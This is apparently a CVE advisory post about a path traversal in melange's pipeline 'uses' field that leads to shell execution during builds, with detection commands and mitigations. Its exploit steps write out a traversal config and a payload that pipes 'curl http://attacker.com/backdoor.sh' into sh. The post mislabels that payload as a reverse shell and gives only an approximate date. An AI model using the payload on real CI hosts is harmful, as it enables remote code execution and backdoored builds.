Listen to this Post
How the mentioned CVE works (technical details):
The vulnerability resides in melange’s `compilePipeline` function inside pkg/build/compile.go. An attacker controls the `pipeline[].uses` field in a melange configuration file. The function calls `filepath.Join(pipelineDir, uses + “.yaml”)` without sanitizing uses. By providing a value like `../../../etc/passwd` or an absolute path like /tmp/evil.yaml, the resulting path escapes the intended --pipeline-dir. The function then loads that arbitrary YAML file. Because melange interprets any loaded YAML as a pipeline definition, the attacker can embed a `runs:` block in that external file. During the build, melange executes the `runs:` commands via `/bin/sh -c` inside the build sandbox. This allows an attacker who can supply a malicious config (e.g., via PR-triggered CI) to read sensitive files and execute arbitrary shell commands on the build host. The root cause is missing validation of path traversal sequences and absolute paths before joining with the pipeline directory. The issue bypasses normal code review boundaries because the malicious commands reside in a separately loaded file, not the reviewed configuration. The fix in commit 5829ca4 (v0.43.4) rejects `uses` containing `..` or leading /, and uses `filepath.Rel` after `filepath.Clean` to ensure the resolved path stays within the pipeline directory.
DailyCVE form:
Platform: melange (Chainguard)
Version: before v0.43.4
Vulnerability: path traversal, ACE
Severity: critical
date: 2023-11-27 (approx)
Prediction: Patch already released (v0.43.4)
What Undercode Say:
Analytics:
Attackers exploit uncontrolled `filepath.Join` – similar to many path traversal bugs. The blast radius is high because YAML parsing leads to shell execution. CI/CD pipelines are prime targets. Defenders should audit any `uses:` field in untrusted melange configs.
Check for vulnerable melange version
melange version | grep -E "^v0.[0-3].|^v0.4[0-2].|^v0.43.[0-3]$" && echo "VULNERABLE"
Extract pipeline entries that may contain path traversal
grep -r "pipeline:" . -A5 | grep "uses:" | grep -E "../|^/"
Simulate the vulnerable join (example)
pipelineDir="/home/user/melange/pipelines"
attacker_uses="../../../etc/passwd"
resolved=$(python3 -c "import os.path; print(os.path.join('$pipelineDir', '$attacker_uses' + '.yaml'))")
echo "Resolved path: $resolved"
How Exploit:
- Craft malicious YAML at a known readable location (e.g.,
/tmp/exploit.yaml) with:runs: command: | id > /tmp/pwned curl http://attacker.com/backdoor.sh | sh
2. Create melange config with:
pipeline: - uses: "../../../tmp/exploit"
3. Run `melange build` against the config – no special privileges needed.
4. Observe execution of `id` and reverse shell during build stage.
Protection from this CVE:
- Upgrade to melange v0.43.4 or later.
- If upgrade impossible, never run `melange build` on untrusted configs.
- In CI, manually review all `pipeline[].uses` values – reject any containing `..` or starting with
/. - Apply strict sandboxing: run melange inside a container with read-only root and no host mounts.
- Use static analysis to detect path traversal patterns in CI pipelines.
Impact:
- Confidentiality: Read any YAML-parseable file visible to melange process (e.g., /etc/passwd, source code, secrets).
- Integrity: Execute arbitrary shell commands during build, corrupting build artifacts or injecting backdoors.
- Availability: Disrupt builds or compromise build infrastructure.
- Attack Surface: CI systems accepting PRs from untrusted users (GitHub Actions, GitLab CI, build-as-a-service platforms).
- Bypass: Circumvents code review because malicious commands live in separate, dynamically loaded file.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

